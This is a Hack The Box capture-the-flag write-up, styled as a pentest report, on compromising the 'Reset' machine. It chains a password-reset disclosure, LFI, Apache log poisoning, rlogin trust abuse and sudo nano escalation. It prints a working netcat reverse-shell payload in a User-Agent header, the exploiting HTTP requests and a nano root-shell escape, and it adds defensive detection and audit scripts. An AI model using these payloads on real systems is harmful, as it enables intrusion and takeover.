HTB - Reset

2026-05-11 • htb • easy • linux


An unauthenticated password-reset endpoint discloses a new password for the admin account, granting access to a dashboard that exposes a file-read LFI via a path parameter. Poisoning the Apache access log with a PHP payload in the User-Agent header yields RCE as www-data. Lateral movement to sadm is achieved through the legacy rlogin service on port 513. Privilege escalation abuses an attached tmux session combined with a sudo rule on nano, which permits spawning a root shell via nano's command-execution feature.

Tags: password-reset, lfi, log-poisoning, rlogin, tmux-hijack, sudo-abuse, gtfobins
Tools: nmap, burpsuite, rlogin, penelope

Hack The Box — Reset

Easy | Linux | Hack The Box


Field       | Value
Report Date | 11 May 2026
Assessed By | RobInTheHood
Target IP   | 10.129.234.130
Hostname    | reset
Domain      | N/A

Table of Contents

  1. Executive Summary
  2. Scope
  3. Methodology
  4. Attack Chain Summary
  5. Findings
  6. Proof of Access
  7. Credentials Discovered
  8. Impact Assessment
  9. Remediation Summary
  10. Key Takeaways
  11. Tools Used
  12. Disclaimer

1. Executive Summary

This report documents the compromise workflow for the Hack The Box machine Reset. The objective was to obtain full system-level access in an authorised lab environment and document the attack path with reproducible evidence.

A PHP web application exposes an unauthenticated password-reset endpoint that, when invoked with the username admin, returns the newly generated password in the HTTP response body. The resulting authenticated session reveals a dashboard.php log viewer that accepts a server-side file parameter, constituting a Local File Inclusion. By poisoning the Apache access.log with a PHP payload embedded in the User-Agent header and then including the log via the LFI, remote code execution is achieved as www-data. The legacy rlogin service on port 513 is used to authenticate laterally as the sadm user via host trust. Finally, an attached tmux session held by sadm, combined with a sudo rule permitting nano /etc/firewall.sh, is abused via nano’s built-in command execution (Ctrl+R, Ctrl+X) to spawn a root shell.


2. Scope

Field            | Value
Target IP        | 10.129.234.130
Hostname         | reset
Domain           | N/A
Operating System | Linux (Ubuntu 22.04.5 LTS)
Machine Rating   | Easy
Environment      | Hack The Box — Authorised Training Lab
Assessment Date  | 11 May 2026
Assessor         | RobInTheHood

3. Methodology

  • Reconnaissance — service discovery and external attack-surface mapping
  • Enumeration — credential, configuration, and trust-path analysis
  • Exploitation — initial access through validated vulnerability paths
  • Lateral Movement — privilege pivoting and cross-context execution
  • Privilege Escalation — full compromise to root/SYSTEM context
  • Post-Exploitation — proof collection and impact-oriented validation

4. Attack Chain Summary

Phase                | Technique                                                                                 | MITRE ATT&CK
Recon                | Nmap — SSH on 22, HTTP on 80, exec/login/shell on 512/513/514                             | T1046
Enumeration          | Web enumeration of PHP login page → discovery of password-reset endpoint                  | T1083
Initial Access       | Password-reset disclosure for admin → authenticated dashboard                             | T1078
Exploitation         | LFI on file parameter → Apache log poisoning via User-Agent PHP payload → RCE as www-data | T1190 · T1059.004
Lateral Movement     | rlogin (port 513) as sadm via host-trust                                                  | T1021
Privilege Escalation | Attached tmux session + sudo nano → command execution via Ctrl+R/Ctrl+X                   | T1548.003 · T1059.004

5. Findings

F-01 — Technical Walkthrough

Reconnaissance

nmap -Pn -v -sS -p- -oN nmap.txt 10.129.234.130

Port    | Service
22/tcp  | SSH
80/tcp  | HTTP
512/tcp | exec (rexec)
513/tcp | login (rlogin)
514/tcp | shell (rsh)

The presence of the BSD r-services (512/513/514) is highly unusual on a modern host and immediately signals a potential trust-based lateral movement vector.


Enumeration — Web Application

Port 80 serves a PHP login page that exposes a “reset password” function. Issuing a reset request against the admin account returns the freshly generated password directly in the HTTP response body:

HTTP/1.1 200 OK
Date: Sat, 09 May 2026 22:55:00 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 80
Content-Type: application/json

{"username":"admin","new_password":"58ed7ae9","timestamp":"2026-05-09 22:55:00"}

Authenticating with admin:58ed7ae9 redirects the session to dashboard.php, which provides a log viewer offering two preset options: syslog and auth.log.


Local File Inclusion

Inspection of the dashboard request in Burp Suite reveals that the log-viewer transmits the absolute path of the requested log via a file POST parameter:

POST /dashboard.php HTTP/1.1
Host: 10.129.234.130
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=trah3d32vq4suijk1bt3fch815

file=%2Fvar%2Flog%2Fsyslog

The parameter is not constrained server-side, allowing arbitrary file inclusion. Because Apache 2.4 serves the application, the Apache access log is requested:

file=%2fvar%2flog%2fapache2%2faccess.log

The response confirms read access, with request entries echoed verbatim including the User-Agent header.
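The contrast between the dashboard's behaviour and the two ways of fixing it, written out as an added Python illustration (not code from the report or from the target application, whose dashboard is PHP; the LOG_PRESETS table, LOG_DIR and the function names are assumptions). The point it makes is that a directory-prefix check alone would not have broken this chain, because the Apache access log itself lives under /var/log; only an allow-list of preset names removes the poisoning target from reach.

```python
import os

# Constructed preset table: the dashboard's two menu options mapped to the only
# files the viewer may open. The client never supplies a path, only a key.
LOG_PRESETS = {
    "syslog": "/var/log/syslog",
    "auth.log": "/var/log/auth.log",
}
LOG_DIR = "/var/log"


def resolve_vulnerable(file_param: str) -> str:
    """Behaviour described in the writeup: the POST `file` value is used as-is."""
    return file_param


def resolve_prefix_checked(file_param: str):
    """Partial fix: canonicalise and require the file to live under LOG_DIR.
    Stops '..' traversal, but every file under /var/log stays reachable,
    including apache2/access.log, so the log-poisoning path survives."""
    base = os.path.realpath(LOG_DIR)
    candidate = os.path.realpath(file_param)
    if candidate.startswith(base + os.sep):
        return candidate
    return None


def resolve_allow_listed(file_param: str):
    """Full fix: treat the client value as a preset *name* and look it up.
    Anything that is not exactly one of the keys, path-like or not, is refused."""
    return LOG_PRESETS.get(file_param)


if __name__ == "__main__":
    samples = [
        "syslog",
        "/var/log/syslog",
        "/var/log/apache2/access.log",
        "/var/log/../../etc/passwd",
    ]
    for s in samples:
        print(f"{s!r:32} prefix-check={resolve_prefix_checked(s)!r:36} "
              f"allow-list={resolve_allow_listed(s)!r}")
```

Running the block prints one row per sample; the access-log path is accepted by the prefix check and rejected by the allow-list, which is exactly the difference between the two remediation options listed later in the report.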


Initial Access — Log Poisoning via User-Agent

Apache writes each request’s User-Agent value into access.log unsanitised. Because the LFI includes the file as PHP source rather than reading it as plain text, a <?php ... ?> payload placed in the User-Agent is executed the moment the log file is included.

Stage 1 — poison the log with a reverse-shell payload:

GET /dashboard.php HTTP/1.1
Host: 10.129.234.130
User-Agent: <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.179 4444 >/tmp/f'); ?>

Stage 2 — include the poisoned log to execute the payload:

POST /dashboard.php HTTP/1.1
Host: 10.129.234.130
Content-Type: application/x-www-form-urlencoded

file=%2fvar%2flog%2fapache2%2faccess.log

A reverse shell as www-data is received on the listener:

[May 11, 2026 - 14:33:37 (EDT)] exegol-Reset /workspace # penelope -i tun_htb 4444
[+] Listening for reverse shells on 10.10.14.179:4444
[+] Got reverse shell from reset~10.129.234.130-Linux-x86_64
[+] Shell upgraded successfully using /usr/bin/python3!
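From the defender's side, both stages of this chain leave traces in the same access log. The following is an added Python detector, not part of the report or of any tool it mentions: it parses Apache combined-format lines, flags PHP open tags or command-execution function names in the request line, Referer or User-Agent, and then flags a later POST to the log viewer from an IP that already planted a marker. The log lines are constructed for the example (the attacker IP matches the writeup, the rest is made up), and the marker list and finding keys are assumptions.

```python
import re

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>.*)"$'
)

# Markers that have no business in a header or request line: PHP open tags and
# the execution functions a poisoned entry would call.
PHP_MARKERS = [
    re.compile(r"<\?php", re.I),
    re.compile(r"<\?="),
    re.compile(r"\b(system|passthru|shell_exec|exec|eval)\s*\(", re.I),
]

# Constructed sample log (not captured from the target): a normal request, a
# poisoned User-Agent, a PHP tag in the query string, and the follow-up POST
# that would pull the log back through the dashboard's file parameter.
SAMPLE_LOG = """\
10.10.14.179 - - [11/May/2026:14:30:01 +0000] "GET /dashboard.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.179 - - [11/May/2026:14:31:10 +0000] "GET /dashboard.php HTTP/1.1" 200 512 "-" "<?php system('id'); ?>"
10.10.14.179 - - [11/May/2026:14:32:05 +0000] "GET /index.php?x=<?=phpinfo()?> HTTP/1.1" 404 196 "-" "curl/8.5.0"
10.10.14.179 - - [11/May/2026:14:33:20 +0000] "POST /dashboard.php HTTP/1.1" 200 9812 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""


def scan_access_log(text):
    """Return one finding per suspicious line: PHP markers in any logged field,
    plus any later POST to the log viewer from an IP that already planted one
    (the inclusion step of the chain). Unparseable lines are reported too."""
    findings = []
    poisoned_ips = set()
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            findings.append({"line": n, "kind": "unparsed", "ip": None})
            continue
        hit = next(
            ((field, pat.pattern) for field in ("req", "ref", "ua")
             for pat in PHP_MARKERS if pat.search(m[field])),
            None,
        )
        if hit:
            poisoned_ips.add(m["ip"])
            findings.append({"line": n, "kind": f"php-in-{hit[0]}",
                             "ip": m["ip"], "marker": hit[1]})
        elif m["ip"] in poisoned_ips and m["req"].startswith("POST /dashboard.php"):
            findings.append({"line": n, "kind": "include-after-poison", "ip": m["ip"]})
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The second rule is the useful one operationally: a PHP tag in a User-Agent is noisy but harmless on its own, whereas the same client then posting to the log viewer is the inclusion step, and that pairing is what a WAF rule or SIEM correlation should key on.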

User Flag

The user flag is readable directly from the initial foothold context:

www-data@reset:/var/www/html$ cat /home/sadm/user.txt
19ba954c8ba8400cbfc0277f5f1669a4

Lateral Movement — rlogin to sadm

The Nmap scan flagged the BSD r-services on 512/513/514. The rlogin daemon (513) authenticates clients based on a ~/.rhosts or /etc/hosts.equiv trust relationship combined with the client-side Unix username — no password is required when the trust is satisfied.

To make rlogin advertise the username sadm to the target, a local user named sadm is created on the attacking host and used to issue the connection:

exegol-Reset /workspace # sudo su sadm
sadm@exegol-Reset:/workspace$ rlogin 10.129.234.130 -l sadm

Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-140-generic x86_64)
Last login: Mon May 11 17:50:24 UTC 2026 from 10.10.14.179 on pts/0
sadm@reset:~$

The local Unix account is required because the rlogin client transmits its current effective username; without a matching local sadm, the trust check on the server fails.
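Because the server-side trust lives entirely in /etc/hosts.equiv and ~/.rhosts, auditing those files is the quickest way to see how exposed an r-services host is. The following is an added Python audit helper, not from the report or the target; the entry format is assumed from hosts.equiv(5) and rhosts(5) ("host [user]" per line, "+" as a wildcard, "+@name" for a netgroup, a leading "-" for a deny entry, "#" comments), the sample file is constructed, and the severity labels are the author's own choice.

```python
# Constructed sample trust file, not taken from the target.
SAMPLE_HOSTS_EQUIV = """\
# constructed example
+                      # any host, any user: passwordless rlogin from anywhere
10.10.14.0 +           # one host, but any remote username is accepted
-untrusted.lan         # explicit deny, not a trust grant
jumpbox.lan            # host trusted on whatever username the client claims
"""


def audit_trust_file(text, path="/etc/hosts.equiv"):
    """Return one finding per entry that grants trust, with a severity.
    Entries in /etc/hosts.equiv are system-wide, so they rate higher than the
    same entry in a single user's ~/.rhosts."""
    system_wide = path == "/etc/hosts.equiv"
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        host = parts[0]
        user = parts[1] if len(parts) > 1 else None
        if host.startswith("-"):
            continue  # deny entries remove trust rather than grant it
        if host == "+":
            severity, reason = "critical", "any host is trusted"
        elif host.startswith("+@"):
            severity, reason = "high", f"every host in netgroup {host[2:]} is trusted"
        else:
            severity = "high" if system_wide else "medium"
            reason = f"{host} is trusted on the username the client reports"
        if user == "+":
            severity = "critical"
            reason += "; any remote username is accepted"
        elif user and system_wide:
            # hosts.equiv(5) semantics as assumed here: a named remote user may
            # log in as any local account other than root.
            reason += f"; remote user {user} may log in as any local non-root account"
        findings.append({"line": n, "entry": line, "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in audit_trust_file(SAMPLE_HOSTS_EQUIV):
        print(f"{finding['severity']:8} line {finding['line']}: {finding['entry']}  ({finding['reason']})")
```

Even the "medium" entries are only medium relative to the others: as the writeup shows, any trusted host can present an arbitrary username, so the real remediation is to remove the r-services rather than to tune these files.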


Privilege Escalation — tmux Session + Sudo nano

Process enumeration shows a detached tmux session owned by sadm:

sadm@reset:~$ ps auxf | grep tmux
sadm  1180  0.0  0.2  8784  4076 ?  Ss  13:05  0:00 tmux new-session -d -s sadm_session

Attaching to the session inherits its environment:

sadm@reset:~$ tmux a -t sadm_session

Within the session, sudo -l reveals a high-impact rule:

User sadm may run the following commands on reset:
    (root) NOPASSWD: /usr/bin/nano /etc/firewall.sh

GNU nano exposes a built-in command-execution shortcut: pressing Ctrl+R (read file) followed by Ctrl+X (execute command) opens a prompt that runs an arbitrary shell command in the context of the running editor — in this case, root.

Spawning an interactive shell from inside the editor:

Command to execute: reset; bash 1>&0 2>&0

This yields a root shell:

root@reset:/home/sadm# id
uid=0(root) gid=0(root) groups=0(root)

root@reset:/home/sadm# cat /root/root_279e22f8.txt
7ad6951bcb5a2edaffd7908b013d29b0
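The sudo rule is the root of this escalation, and the same class of rule (an interactive editor or pager run as root) recurs on many hosts. The following is an added Python audit of `sudo -l` style output, not part of the report or of any tool it uses: it parses each "(runas) [NOPASSWD:] command args" line and flags commands whose binary can run shell commands from inside its own interface, as nano does via Ctrl+R/Ctrl+X. The sample output is constructed around the rule from the writeup, and the binary list, regex and finding keys are assumptions.

```python
import os
import re

# Interactive binaries that can launch a shell command from their own UI
# (the nano Ctrl+R/Ctrl+X path in the writeup is one instance). Any of them run
# as root via sudo yields a root shell, whatever file argument the rule pins.
SHELL_ESCAPE_BINARIES = {"nano", "vi", "vim", "less", "more", "man", "ed"}

# One sudo rule line as printed by `sudo -l`: "(runas) TAG: ... command args".
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)(?:\s+(?P<args>.*))?$"
)

# Constructed `sudo -l` output: the rule from the writeup plus two others for contrast.
SAMPLE_SUDO_L = """\
User sadm may run the following commands on reset:
    (root) NOPASSWD: /usr/bin/nano /etc/firewall.sh
    (root) /usr/bin/systemctl restart nftables
    (ALL : ALL) ALL
"""


def audit_sudo_rules(text):
    """Return one record per rule line with runas, NOPASSWD flag, command, args
    and a risk string (None when the rule does not match a known escape)."""
    findings = []
    for raw in text.splitlines():
        m = RULE_RE.match(raw)
        if not m:
            continue  # header lines and blanks are not rules
        cmd = m["cmd"]
        binary = os.path.basename(cmd)
        rule = {
            "runas": m["runas"].strip(),
            "nopasswd": "NOPASSWD:" in m["tags"],
            "command": cmd,
            "args": m["args"] or "",
        }
        if cmd == "ALL":
            rule["risk"] = "unrestricted sudo"
        elif binary in SHELL_ESCAPE_BINARIES:
            rule["risk"] = f"{binary} can execute shell commands from its UI"
        else:
            rule["risk"] = None
        findings.append(rule)
    return findings


if __name__ == "__main__":
    for rule in audit_sudo_rules(SAMPLE_SUDO_L):
        flag = "RISK" if rule["risk"] else "ok  "
        print(f"{flag} ({rule['runas']}) {rule['command']} {rule['args']}  {rule['risk'] or ''}")
```

Where the business need is "sadm must be able to edit /etc/firewall.sh", the rule to grant is `sudoedit /etc/firewall.sh` rather than `nano` as root: sudoedit copies the file, runs the user's editor unprivileged on the copy and writes the result back, so nano's command-execution prompt runs as sadm, not as root.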

6. Proof of Access

Level | Evidence
User  | 19ba954c8ba8400cbfc0277f5f1669a4
Root  | 7ad6951bcb5a2edaffd7908b013d29b0

7. Credentials Discovered

Account | Secret              | Type                          | Source
admin   | 58ed7ae9            | Web application password      | Password-reset response disclosure
sadm    | host-trust (rlogin) | Implicit BSD r-services trust | /etc/hosts.equiv / ~/.rhosts

8. Impact Assessment

Successful exploitation resulted in full system-level compromise through a four-stage chain: an unauthenticated password-reset endpoint that returns the new credential in-band, a server-side file-inclusion in the authenticated dashboard, abuse of Apache log writes to bridge LFI to RCE, and a privileged editor invoked via sudo. None of these vulnerabilities individually requires advanced tooling, and the entire chain is reproducible against any host that combines these primitives.


9. Remediation Summary

Priority | Action
Critical | Never return generated passwords in HTTP responses; deliver out-of-band (email/SMS) and require a one-time reset link rather than a direct credential disclosure.
Critical | Validate the file parameter against a strict allow-list (e.g., syslog, auth.log) and forbid absolute paths; better still, eliminate user-controlled file selection from the dashboard entirely.
Critical | Disable the BSD r-services (rexec, rlogin, rsh); they transmit credentials and trust state in cleartext and are obsolete.
High     | Remove the sudo rule permitting nano to be executed as root, or replace nano with a constrained editor that disables command execution.
High     | Audit user-owned tmux/screen sessions; prevent shared sessions from persisting unattended.
Medium   | Enable Apache mod_security or equivalent WAF rules to detect log-poisoning payloads in headers.

10. Key Takeaways

  • In-band disclosure of generated credentials in password-reset flows is equivalent to having no reset protection at all.
  • An LFI becomes RCE the moment the attacker can write attacker-controlled data into any file the inclusion can reach — server access logs are the canonical sink.
  • Legacy BSD r-services treat the client-supplied username as ground truth; preserving them in 2026 effectively grants any neighbouring host a free authentication primitive.
  • GTFOBins-style escalation via editors invoked with sudo remains one of the most reliable privilege escalation paths on Linux — nano, vi, less, and more all expose command execution from within their UI.

11. Tools Used

Tool       | Purpose
nmap       | Port and service discovery
Burp Suite | Request inspection and parameter tampering for LFI and log poisoning
penelope   | Reverse shell listener and PTY upgrade
rlogin     | Lateral movement via legacy host-trust
tmux       | Session attach for privilege inheritance

12. Disclaimer

This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.


End of Report — Reset | RobInTheHood | 11 May 2026